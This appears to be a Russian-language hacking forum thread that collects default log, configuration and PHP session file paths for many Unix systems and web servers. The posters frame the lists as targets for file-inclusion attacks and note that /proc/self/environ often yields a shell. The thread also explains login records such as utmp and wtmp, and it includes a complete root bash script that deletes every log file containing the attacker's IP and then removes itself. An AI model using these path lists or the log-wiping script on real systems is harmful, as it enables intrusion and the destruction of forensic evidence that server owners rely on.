/var/run/utmp
/var/log/secure
/root/.ksh_history
/root/.bash_history
/root/.bash_logut
/var/log/wtmp
/etc/wtmp
/var/run/utmp
/etc/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/usr/local/apache/log
/usr/local/apache/logs
/var/log/acct
/var/log/xferlog
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/usr/local/www/logs/thttpd_log
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth


Red Hat, Mac OS X

/var/log/httpd/access_log
/var/log/httpd/error_log

Solaris

/var/apache/logs/access_log
/var/apache/logs/error_log

SuSE Linux Enterprise Server

/var/log/httpd/access_log
/var/log/httpd/error_log

Lampp

/opt/lampp/logs/error_log
/opt/lampp/logs/access_log


Debian

/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/access.log


FreeBSD

/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log

OpenBSD

/var/www/log/access_log
/var/www/log/error_log

5 копеек..

/usr/local/apache2.2/
/usr/local/apache2.2/logs/access_log
/usr/local/apache2.2/logs/error_log

Kак пишутся логины в систему

Есть основные места, в которых сохраняется системная информация о логине:

/usr/etc/wtmp
/usr/etc/lastlog
/etc/utmp

utmp пишет инфу о том, кто в настоящее время использует систему.
Файл - последовательность входов со следующей структурой, которая конфигурится в /usr/include/utmp.h

struct utmp {
char ut_line[8]; /* tty name */
char ut_name[8]; /* user id */
char ut_host[16]; /* host name, if remote */
long ut_time; /* time on */
}

Эта структура пишет название терминалки юзера, юзер ID-ентификатор логиняшегося,имя хоста откель логинился, если не локально и время входа в систему. на многих платформах структура разная, но все равно легко достаточно читается.

wtmp пишет все входа и выходы из системы. Пустое имя пользователя указывает выход из системы на связанном терминале.
Кроме того, '~' указывает, что система была перезагружена в указанное время; вход с именами включающими'|'
говорит, что система изменила время как раз перед логоном и с именами и '{' после того как был совершен логон (то есть ,
команда даты изменила время системы.

Wtmp обслуживается login(1) и init (8). Они свои события по идее не пишут никуда, так что если их отрубить, то и логи
в wtmp писаться не будут. Wtmp используется вместе с командой/usr/ucb/last. Это понятно? Запросто проверить если
служба не работает.

/usr/adm/lastlog используется login(1) для того, чтобы сохранить предыдущие даты входа в систему, время, в которое они
были, и с какого хоста подключались. Структура для lastlog такая:

struct lastlog {
time_t ll_time;
char ll_line[8];
char ll_host[16];
};

FreeBSD 7.1-RELEASE 2009 i386
/var/log/httpd-error.log
/var/log/httpd-access.log

архив в первом посте битый (auto_includer.zip (3.6 Кбайт, 146 просмотров)). Есть у кого нибудь?

/usr/local/etc/apache2/vhosts.conf
/usr/local/apache/conf/vhosts.conf
/usr/local/apache2/conf/vhosts.conf
/usr/local/apache/conf/vhosts-custom.conf
/usr/local/apache2/conf/vhosts-custom.conf


прим. BlackSun: пути в данном случае должны начинаться со слешей, без них это относительные пути.

там всегда полный и правильный Document Root + часто полный адрес ERROR логов

Ну и моё любимое чото тут не наблюдал вроде:


/proc/self/environ


если нашли такое - в 99% случаев сразу шелл

прим. BlackSun: ты хоть ветку почитай полностью .. https://forum.antichat.ru/showpost.php?p=1088072&postcount=11

sess_ location
/tmp/
/php_sess/
/tmp/phpsess/
/tmp/php/
/tmp/php-sess/
/home/%username%/tmp/
/var/phptemp/
/var/phptmp/
/var/phpsess/
/var/php-sess/
/var/lib/php/
/var/lib/php/session/
/var/lib/php3
/var/lib/php3/session/
/var/lib/php4/
/var/lib/php4/session/
/var/lib/php5/
/var/lib/php5/session/
/var/lib/php6/
/var/lib/php6/session/
/www/phpsession/
C:\Temp
C:\WINDOWS\Temp
C:\PHP\sessiondata

.htaccess
php_value "session.save_path" "/path"

phpinfo()
session.save_handler files
session.save_path /path

Самый лучший вариант это поиск пшпинфо на сайте, т.к в нём вы увидим мастер валью, т.е то что прописано в php.ini и локал валью, то что прописано (если прописано) в .htaccess'e
Второй вариант поиск пшп.ини и .htaccess'ов
Ну и конечно можно просто искать саму папку с сессиями

Только что так заюзал:

/etc/apache/default-server.conf
/etc/apache2/default-server.conf


может содержать DocumentRoot

Cкрипт, который находит и удаляет лог файлы
#!/usr/local/bin/bash
### coded by t4z3v4r3d
### recurse function : i m not sure who has write that .So thanks unknown man
### made for FreeBSD First ....
if [ "`id -u`" != "0" ];then
echo "$0 cant run as $USER Please Give me the root perms!!!!! "
exit 1
fi
patern=$2
fl=/tmp/f.txt
fd=/tmp/find.txt
length=/tmp/l-f.txt
log_f=/tmp/log_f.txt
log_final=/tmp/final_log.txt
null=/dev/null
log_path=/tmp/log_Found_.txt
tm="`date | cut -d ":" -f 1`"
os=$OSTYPE
# you can add all paths for all os type !M$ windows IS NOT OS ....Exactly!
case $os in
Linux*) path=/etc/
;;
linux*) path=/etc/
;;
freebsd*) path=/usr/local/
;;
*) path=/
;;
esac


rm $fl
touch $fl
rm $fd
touch $fd
rm $log_f
touch $log_f
rm $log_final
touch $log_final
rm $log_path
touch $log_path
clear

echo "Enter attacker IP"
read -e ip


if [ "`find $path -name apache >> $fl`" ];then
echo -e "\033[3;2f Main path Found ....\033[0;0m"
else

if [ "`find $path -name apache2 >> $fl`" ];then
echo "Founded Apache2 Config files"
fi
fi

recurse () {
for file in $(/bin/ls $1)
do fqfn=$1/$file
[[ -d $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
[[ -f $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }

################################################## #######
if [ -f $1 ];then
let "f=f+1"
if [ "`ls $1 | grep -F .conf`" ];then
let "t=t+1"
cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2 >> $log_path
nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`"
echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt
let "nt=nt+${nom[$t]}"
let "j=$nt+$t"
fi
fi
################################################## ##############################
### MOnitoring all acts
################################################## ##############################
echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Scanned Files :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Path(s) found :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern found :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern total :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`::: \033[1;39m\033[8;40f|\033[0;0m"
echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
################################################## ############################
done ; }

reader(){
cat $fl | while read line ;do
if [ "`ls $line | grep .conf`" != "" ];then
recurse $line
fi
let "l=l+1"
done
}

reader

log_path_reader(){
cat $log_path | while read line ;do
if [ -f $line ];then
if [ "`cat $line | grep "$ip"`" != "" ];then
echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`" \033[1;30m] $ip in "
echo -n "Removing $line"
rm $line

if [ ! -f $line ];then
echo -e "\033[1;39m ... Done !\033[0;0m"
else
echo -e "\033[1;31m ...Failed!\033[1;0m"
fi

fi
else
echo -e "\033[1;30mFile [\033[1;31m"$line " \033[1;39mFile Dose not exist......\033[1;30m]"
fi

let "l2=l2+1"
done
}
echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m"
echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files \033[0;0m"

log_path_reader

echo -en "\033[1;30mRemoving $0 "

rm $fl $log_path $0

if [ ! -f $0 ];then
echo -e "\033[1;39m ... Done !\033[0;0m"
else
echo -e "\033[1;31m ...Failed!\033[1;0m"
fi
echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m"

Пути логов по умолчанию у apache для разных ОС:
hxxp://wiki.apache.org/httpd/DistrosDefaultLayout

Zeus Web Server (ZWS)
default conf:
/usr/local/zeus/web/global.cfg

default log:
/usr/local/zeus/web/log/errors

LiteSpeed Web Server

default conf:
/opt/lsws/conf/httpd_conf.xml
/usr/local/lsws/conf/httpd_conf.xml

default log:
/opt/lsws/logs/error.log
/opt/lsws/logs/access.log
/usr/local/lsws/logs/error.log
/usr/local/logs/access.log

Зачастую демоны запускаются через init.d. Это существенно облегчает нам поиск логов и конфигов

init.d - mysql
/etc/init.d/mysql

init.d - apache
/etc/init.d/httpd
/etc/init.d/apache
/etc/init.d/apache2

Как примерно выглядит этот файл


#!/bin/sh
#
# Copyright (c) 1996, 1997, 1998 S.u.S.E. GmbH
# Copyright (c) 1998, 1999, 2000, 2001 SuSE GmbH
# Copyright (c) 2002, 2003 SuSE Linux AG
#
# Authors: Rolf Haberrecker <rolf@suse.de>, 2001
# Peter Poeml <poeml@suse.de>, 2002, 2003, 2004, 2005
#
#
# /etc/init.d/apache2
#
### BEGIN INIT INFO
# Provides: apache2 httpd2
# Required-Start: $local_fs $remote_fs $network
# X-UnitedLinux-Should-Start: $named $time postgresql sendmail mysql ypclient dhcp radiusd
# Required-Stop: $local_fs $remote_fs $network
# X-UnitedLinux-Should-Stop:
# Default-Start: 3 5
# Default-Stop: 0 1 2 6
# Short-Description: Apache 2.2 httpd
# Description: Start the httpd daemon Apache
### END INIT INFO

pname=apache2
: ${sysconfdir:=/etc/$pname}
: ${apache_link:=/usr/sbin/httpd2}
: ${sysconfig_apache:=/etc/sysconfig/$pname}
: ${pidfile:=/var/run/httpd2.pid}
: ${logdir:=/var/log/$pname}

#
# load the configuration
#
test -s /etc/rc.status && . /etc/rc.status && rc_reset

. /usr/share/$pname/load_configuration
export ${!APACHE_*}

httpd_conf=${APACHE_HTTPD_CONF:-$sysconfdir/httpd.conf}

apache_bin=$(/usr/share/$pname/find_mpm 2>/dev/null)

test -L $apache_link && apache_bin=$(readlink $apache_link)

if [ -z "$APACHE_MPM" ]; then
APACHE_MPM=${apache_bin##*-}
fi

if ! [ -x $apache_bin ]; then
echo >&2 ${warn}$apache_bin-$APACHE_MPM is not a valid httpd2 binary.
echo >&2 Check your APACHE_MPM setting in /etc/sysconfig/$pname. $norm
rc_failed 5
rc_status -v1
rc_exit
fi

get_server_flags()
{
unset server_flags
case "$action" in startssl) server_flags="-DSSL";; esac
for i in $APACHE_SERVER_FLAGS; do
case $i in
-D) ;;
-D*) server_flags="$server_flags $i";;
*) server_flags="$server_flags -D$i";;
esac
done
}

action="$1"
case "$action" in
stop|try-restart|*status*|probe)
;;
*)
shift; get_server_flags
${get_module_list_done:=false} || /usr/share/$pname/get_module_list && export get_module_list_done=true
${get_includes:=false} || /usr/share/$pname/get_includes && export get_includes_done=true
;;
esac

#
# main part
#
case "$action" in
start*)
if [ -e $pidfile ]; then
$0 status &>/dev/null
ret=$?
if [ $ret = 1 ]; then
echo "Warning: found stale pidfile (unclean shutdown?)"
elif [ $ret = 0 ]; then
echo "Apache is already running ($pidfile)"
rc_failed $ret
rc_status -v1
rc_exit
fi
fi

echo -n "Starting httpd2 (${APACHE_MPM:-${apache_bin#*-}}) "
cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@")
if eval $cmdline -t > $logdir/rc$pname.out 2>&1 ; then
export -n ${!APACHE_*}
eval startproc -f -t ${APACHE_START_TIMEOUT:-2} $cmdline
ret=$?

if test -t 1 && stty -a 2>/dev/null | grep -q -- -echo\ ; then
# this means that apache was still waiting for a passphrase to be entered
stty echo 2>/dev/null
echo;echo
echo >&2 An SSL passphrase has not been entered within ${APACHE_START_TIMEOUT:-<not set>} seconds.
echo >&2 To increase this timeout, adjust APACHE_START_TIMEOUT in $sysconfig_apache .
# this surely means that apache won't start, despite it looked good to startproc
killall $apache_bin
echo >&2 "Trying to start the server without SSL (-D NOSSL)."
$0 start "$@" -D NOSSL
# rc_failed 1
# rc_status -v1
# rc_exit
else
rc_failed $ret
rc_status -v
fi
else
if [ "$link" = "$base" ] ; then
cat $logdir/rc$pname.out
echo >&2
echo >&2 The command line was:
echo >&2 $cmdline
echo >&2
else
echo -e -n "\nsee $logdir/rc$pname.out for details\n";
fi
rc_failed 1
rc_status -v1
fi
;;
stop)
echo -n "Shutting down httpd2 "
if [ ! -f $pidfile -a -f $pidfile.rpmsave ]; then mv $pidfile.rpmsave $pidfile; fi
if ! [ -f $pidfile ]; then
echo -n "(not running)"
else
pid=$(<$pidfile)
kill -TERM $pid 2>/dev/null
case $? in
1) echo -n "(not running)";;
0) # wait until the processes are gone (the parent is the last one)
echo -n "(waiting for all children to terminate) "
for ((wait=0; wait<120; wait++)); do
if test -f $pidfile; then
usleep 500000
continue
fi
if ! test -f /proc/$pid/exe; then
break
fi
if test "$(readlink /proc/$pid/exe 2>/dev/null)" = $apache_bin; then
usleep 500000
else
break
fi

done
;;
esac
fi

rc_status -v
;;
try-restart)
## Do a restart only if the service was active before.
## Note: try-restart is now part of LSB (as of 1.9).
## RH has a similar command named condrestart.
$0 status
if test $? = 0; then
$0 restart
else
rc_reset # Not running is not a failure.
fi
# Remember status and be quiet
rc_status
;;
restart)
$0 configtest "$@" || { rc_failed $?; rc_exit; }

if $0 status &>/dev/null; then
$0 stop
fi
$0 start "$@"
# Remember status and be quiet
rc_status
;;
restart-hup)
$0 configtest "$@" || { rc_failed $?; rc_exit; }

if $0 status &>/dev/null; then
echo -n "Restarting httpd2 (SIGHUP)"
kill -HUP $(<$pidfile) || return=$rc_failed
else
$0 start "$@"
fi
# Remember status and be quiet
rc_status -v
;;
reload|force-reload|graceful)
echo -n "Reload httpd2 (graceful restart)"
cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@")
if eval $cmdline -t &> $logdir/rc$pname.out; then
killproc -USR1 $apache_bin || return=$rc_failed
rc_status -v
else
if [ "$link" = "$base" ] ; then
echo -e -n "\n\n"
cat $logdir/rc$pname.out
echo >&2
echo >&2 The command line was:
echo >&2 $cmdline
echo >&2
else
echo -e -n "\nsee $logdir/rc$pname.out for details\n";
fi
rc_failed 6
rc_status -v1
fi
;;
status)
if [ ! -f $pidfile -a -f $pidfile.rpmsave ]; then mv $pidfile.rpmsave $pidfile; fi
echo -n "Checking for httpd2: "
# we don't use checkproc here since it is confused when we exchange the binaries
if ! [ -f $pidfile ]; then
# not running
rc_failed 3
elif [ -s $pidfile -a -d /proc/$(<$pidfile) ]; then
# running
:
else
# stale pid file
rc_failed 1
#rm -f $pidfile
fi
rc_status -v
;;
probe)
## Optional: Probe for the necessity of a reload,
## give out the argument which is required for a reload.

for i in $httpd_conf \
$APACHE_CONF_INCLUDE_FILES \
$APACHE_CONF_INCLUDE_DIRS
do
if [ $i -nt $pidfile ]; then
echo reload
break
fi
done
;;

conf*|test|syntax|check)
cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@")
eval $cmdline -t
rc_failed $?
rc_exit
;;

extr*)
cmdline=$(echo $apache_bin -f $httpd_conf $server_flags "$@")
out=$(su - nobody -c "$cmdline" 2>&1)
case $out in
*make_sock:\ could\ not\ bind\ to\ address*) echo Syntax: OK; rc_failed=0;;
*) echo Syntax: NOT OK:; echo $out; rc_failed=1;;
esac
rc_exit
;;

server-status)
apache2ctl status
;;

full-server-status|fullstatus)
apache2ctl fullstatus
;;

*)
cat >&2 <<-EOF
Usage: $0 <command> <server flags>

where <command> is one of:
start - start httpd
startssl - start httpd with -DSSL
stop - stop httpd (sendign SIGTERM to parent)
try-restart - stop httpd and if this succeeds (i.e. if
it was running before), start it again.
status - check whether httpd is running
restart - stop httpd if running; start httpd
reload|graceful - do a graceful restart by sending a SIGUSR1 or
start if not running
configtest - do a configuration syntax test
extreme-configtest - try to run httpd as nobody (detects more errors
by actually loading the configuration, but cannot
read SSL certificates)
probe - probe for the necessity of a reload, give
out the argument which is required for a reload.
(by comparing conf files with pidfile timestamp)
full-server-status - dump a full status screen; requires lynx or w3m
and mod_status enabled
server-status - dump a short status screen; requires lynx or w3m
and mod_status enabled
help - this screen

optional server flags are passed through to httpd.

EOF
exit 1
esac


# Inform the caller not only verbosely and set an exit status.
rc_exit


Смотрим
pname=apache2
: ${sysconfdir:=/etc/$pname}
...
httpd_conf=${APACHE_HTTPD_CONF:-$sysconfdir/httpd.conf}

В данном случае конфиг находится в /etc/apache2/httpd.conf

*обновление постов.

Структура архива:
_all_apache.log.txt
_all_httpd.conf.txt
_all_log.txt -LAMPP, XAMPP, Apache.
_all_php.ini.txt
_all_mysql.txt
_all_mysql_win.txt
_all_cpanel.txt
_all_modsecurity.txt
_all_ftp.txt -ProFTPD, vsftpd, wu-ftpd,Pure-FTPd, MuddleFTPD.
_all_samba.txt
_all_lighthttpd.txt
_all_postgresq.txt

может кто нит перезалит autoincluder
ссылка уже битая

Обновите и перезалейте архив с путями по умолчанию, он битый!

Вот такой вот изврат сегодня во FreeBSD встретил:


/usr/local/etc/apache/httpd.conf
/usr/local/etc/apache/vhosts.conf

Ubuntu (стали часто встречаться):


/etc/apache2/sites-available/default
/etc/apache2/sites-available/default-ssl
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/ports.conf
/etc/apache2/sites-enabled/000-default
/etc/apache2/sites-enabled/default

В sites-enabled обычно лежат симлинки на соответствующие файлы в sites-available

NetBSD:

/usr/pkg/etc/httpd/httpd.conf
/usr/pkg/etc/httpd/httpd-default.conf
/usr/pkg/etc/httpd/httpd-vhosts.conf